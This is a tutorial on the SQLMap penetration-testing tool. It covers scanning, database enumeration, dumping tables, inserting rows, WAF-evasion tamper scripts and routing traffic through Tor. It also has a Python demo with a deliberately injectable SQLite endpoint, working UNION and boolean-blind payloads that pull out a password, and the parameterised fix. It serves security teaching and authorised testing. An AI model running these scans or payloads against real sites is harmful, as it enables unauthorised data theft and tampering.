SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities. It supports a wide range of database management systems (DBMS) including MySQL, PostgreSQL, Oracle, MSSQL, and more. SQLMap offers an array of features, such as database fingerprinting, data extraction, and access to the underlying operating system.
This guide covers SQLMap’s installation, configuration, and usage in detail, including advanced techniques and troubleshooting.
Table of Contents
- Installation
- Basic Usage
- Advanced Usage
- Database Enumeration
- Data Extraction
- Writing to Database
- Advanced SQL Injection Techniques
- Bypassing Common Security Measures
- Automating SQLMap
- Using Proxy and Tor
- Logging and Output
- Troubleshooting
1. Installation
SQLMap is compatible with most operating systems, including Windows, Linux, and macOS. It requires Python (2.6, 2.7, or 3.x) to run.
Installation Steps
- Clone the SQLMap repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
- Navigate to the SQLMap directory:
cd sqlmap-dev
- Verify installation: run SQLMap's help command to confirm it starts:
python3 sqlmap.py -h
Installation via Package Managers
On some systems, SQLMap can be installed directly through package managers. For example, on Debian-based systems:
sudo apt install sqlmap
2. Basic Usage
SQLMap operates by testing specific URLs to determine if they are vulnerable to SQL injection attacks.
2.1 Basic Scan for SQL Injection
A simple scan requires the -u option followed by the target URL:
python3 sqlmap.py -u "http://example.com/index.php?id=1"
SQLMap will automatically detect potential SQL injection points, test them, and report back with findings.
2.2 Selecting Injection Point
By default SQLMap tests every GET and POST parameter it finds in the request. To restrict testing to a particular parameter, name it with -p; the parameter must actually be present in the URL, otherwise SQLMap warns that it is not inside the target and has nothing to inject into. For example (the page parameter is added here only to show that it is skipped):
python3 sqlmap.py -u "http://example.com/index.php?id=1&page=2" -p id
This will focus the SQL injection attempts on the id parameter.
3. Advanced Usage
SQLMap provides powerful capabilities beyond basic detection. Below are advanced options for data extraction, database enumeration, and interacting with database systems.
3.1 Database Enumeration
To enumerate the databases on the target server, use:
python3 sqlmap.py -u "http://example.com/index.php?id=1" --dbs
3.2 Enumerate Tables
To list tables within a specific database:
python3 sqlmap.py -u "http://example.com/index.php?id=1" -D database_name --tables
Replace database_name with the name of the database.
3.3 Data Extraction
To extract all data from a specific table:
python3 sqlmap.py -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump
SQLMap will export the contents of the specified table.
3.4 Writing to Database
SQLMap can also run arbitrary SQL statements of your own with --sql-query. For example, to insert a row into a table:
python3 sqlmap.py -u "http://example.com/index.php?id=1" --sql-query "INSERT INTO users (username, password) VALUES ('admin', 'password')"
Two caveats apply. SELECT statements can be answered through any injection technique, but INSERT, UPDATE and DELETE only work where the injection point supports stacked queries (the S technique), which depends on the DBMS and the application's database driver. And unlike enumeration, writing changes the target's data; do this only inside the scope you have been authorised to test, and record exactly what was written so it can be cleaned up.
4. Advanced SQL Injection Techniques
SQLMap supports a wide range of SQL injection techniques, including but not limited to:
- Boolean-based blind: inject a condition and infer its answer from whether the page content changes, since the query's result is never shown directly.
- Time-based blind: inject a condition that delays the response when true, so the answer is read from the response time rather than the page.
- Error-based: leverage database error messages that echo part of a query's result.
- Union-based: append a UNION SELECT whose rows are rendered in the page alongside the legitimate results.
To restrict SQLMap to particular techniques, pass their letters to --technique (the default, BEUSTQ, tries all of them):
python3 sqlmap.py -u "http://example.com/index.php?id=1" --technique=U
Options:
- B: Boolean-based blind
- E: Error-based
- U: Union query-based
- S: Stacked queries
- T: Time-based blind
- Q: Inline queries
Letters can be combined; --technique=BU, for instance, tests only boolean-based blind and union-based injection.
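To make the difference between the union-based and boolean-based blind techniques concrete, here is an added example (not code from the original guide or from the sqlmap project): a toy vulnerable endpoint backed by an in-memory SQLite database, together with hand-written extraction of the same value by both techniques, which is what sqlmap's --technique=U and --technique=B automate. The tables, rows and endpoint are constructed for illustration; the bisection over character codes is the same trick sqlmap uses to keep blind extraction to a handful of requests per character.

```python
# Added example (not part of the original guide or the sqlmap project): a toy
# vulnerable endpoint backed by an in-memory SQLite database, with hand-written
# UNION-based and boolean-based blind extraction to show what sqlmap's
# --technique=U and --technique=B automate. All table names, rows and the
# endpoint itself are constructed for illustration.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE products (id INTEGER, name TEXT);
INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 's3cret');
""")
request_count = 0  # counts simulated HTTP requests so the cost of each technique is visible


def vulnerable_page(id_param: str) -> str:
    """Stands in for index.php?id=...: the parameter is concatenated into the SQL (the bug)."""
    global request_count
    request_count += 1
    sql = f"SELECT name FROM products WHERE id={id_param}"
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return "Database error"
    if not rows:
        return "No product"
    return "Product: " + ", ".join(r[0] for r in rows)


def safe_page(id_param: str) -> str:
    """The fixed endpoint: a parameterised query, so the input is only ever data."""
    rows = conn.execute("SELECT name FROM products WHERE id=?", (id_param,)).fetchall()
    return ("Product: " + ", ".join(r[0] for r in rows)) if rows else "No product"


def union_extract(subquery: str) -> str:
    """Union-based (U): make the original query match nothing (id=-1), then append a
    SELECT with the same column count so its result is rendered in the page."""
    page = vulnerable_page(f"-1 UNION {subquery}")
    prefix = "Product: "
    return page[len(prefix):] if page.startswith(prefix) else ""


def boolean_blind_extract(subquery: str, max_len: int = 64) -> str:
    """Boolean-based blind (B): the page only reveals whether the WHERE clause was
    true, so ask one yes/no question at a time about the code point of each
    character. Bisecting 0..127 costs about 7 requests per character instead of
    one request per candidate character."""
    true_page = vulnerable_page("1")
    secret = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"1 AND unicode(substr(({subquery}),{pos},1))>{mid}"
            if vulnerable_page(probe) == true_page:
                lo = mid + 1  # the character's code point is above mid
            else:
                hi = mid      # at or below mid, or NULL once we run past the end
        if lo == 0:
            break             # substr past the end yields '' and unicode('') is NULL
        secret += chr(lo)
    return secret


if __name__ == "__main__":
    target = "SELECT password FROM users WHERE username='admin'"
    print("union :", union_extract(target))
    before = request_count
    print("blind :", boolean_blind_extract(target), f"({request_count - before} requests)")
    print("fixed :", safe_page("-1 UNION " + target))
```

The union path recovers the value in a single request because the page prints query results; the blind path needs dozens because it only ever learns one bit per request, which is why sqlmap prefers union and error-based techniques when they are available and falls back to blind ones. The parameterised query in safe_page shows why neither payload works once the input stops being part of the SQL text.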
5. Bypassing Common Security Measures
5.1 WAF Bypass
SQLMap includes various techniques to bypass Web Application Firewalls (WAF). Use the --tamper option with scripts that rewrite each payload before it is sent (run sqlmap with --list-tampers to see the bundled ones):
python3 sqlmap.py -u "http://example.com/index.php?id=1" --tamper=space2comment
Some common tamper scripts include:
- space2comment: replaces spaces with inline comments (/**/).
- charencode: URL-encodes every character of the payload.
- between: replaces the greater-than operator with NOT BETWEEN 0 AND #, and the equals operator with BETWEEN # AND #.
Several scripts can be chained with commas, e.g. --tamper=space2comment,between; they are applied in priority order.
5.2 Custom User-Agent and Headers
Many websites block requests based on headers. To set a specific User-Agent (or pass --random-agent to pick a real browser string from SQLMap's list):
python3 sqlmap.py -u "http://example.com/index.php?id=1" --user-agent="Mozilla/5.0"
To add custom headers:
python3 sqlmap.py -u "http://example.com/index.php?id=1" --headers="X-Forwarded-For: 127.0.0.1"
6. Automating SQLMap
6.1 Batch Mode
To run SQLMap without prompts for user interaction, use the --batch option, which accepts the default answer to every question:
python3 sqlmap.py -u "http://example.com/index.php?id=1" --batch
6.2 Running from a List of URLs
SQLMap can automate scans for multiple URLs using the -m option:
python3 sqlmap.py -m list_of_urls.txt
Each URL in the list_of_urls.txt file will be scanned sequentially.
7. Using Proxy and Tor
SQLMap supports proxy connections, which can be used for anonymity, to bypass network restrictions, or to inspect every request in an intercepting proxy such as Burp Suite (127.0.0.1:8080 below is Burp's default listener).
7.1 Using an HTTP Proxy
To route traffic through a proxy, use the --proxy option:
python3 sqlmap.py -u "http://example.com/index.php?id=1" --proxy="http://127.0.0.1:8080"
7.2 Using Tor
To use Tor for increased anonymity:
- Start the Tor service on your machine.
- Route SQLMap traffic through Tor, and add --check-tor so SQLMap verifies the exit before sending any payload:
python3 sqlmap.py -u "http://example.com/index.php?id=1" --tor --check-tor
8. Logging and Output
SQLMap provides options to save output for later review.
8.1 Saving Results to File
SQLMap writes its findings on its own: the session file and any retrieved data go under its output directory (by default ~/.local/share/sqlmap/output/ on current versions, with one subdirectory per target host), which --output-dir overrides. To keep the console output as well, redirect it with the shell; -t additionally logs every HTTP request and response to a file:
python3 sqlmap.py -u "http://example.com/index.php?id=1" --output-dir=./sqlmap-out -t traffic.log > output.txt
Note that -o is not an output switch: it turns on all of SQLMap's optimization switches.
8.2 Verbose Mode
To increase verbosity and view more detailed logs:
python3 sqlmap.py -u "http://example.com/index.php?id=1" -v 3
Verbosity levels (each includes everything below it):
- 0: Show only Python tracebacks, error and critical messages
- 1: Show information and warning messages (the default)
- 2: Show debug messages
- 3: Show the payloads injected
- 4: Show the HTTP requests sent
- 5: Show the HTTP response headers
- 6: Show the HTTP response page content
9. Troubleshooting
Common Errors and Solutions
- Target is not responding: check network connectivity and ensure the server is reachable; if it responds slowly, raise --timeout and add --delay between requests.
- WAF blocking requests: use tamper scripts, switch the User-Agent (--random-agent), or slow the scan down with --delay.
- Too many false positives: tell SQLMap how to tell a true response from a false one with --string, --not-string or --regex (a string or pattern that appears only in the true page), or restrict testing to specific techniques with --technique.
Debugging
For additional debug information, use the -v flag with level 3 (payloads) or higher; level 4 also prints every request, which is the quickest way to see exactly what the target receives:
python3 sqlmap.py -u "http://example.com/index.php?id=1" -v 3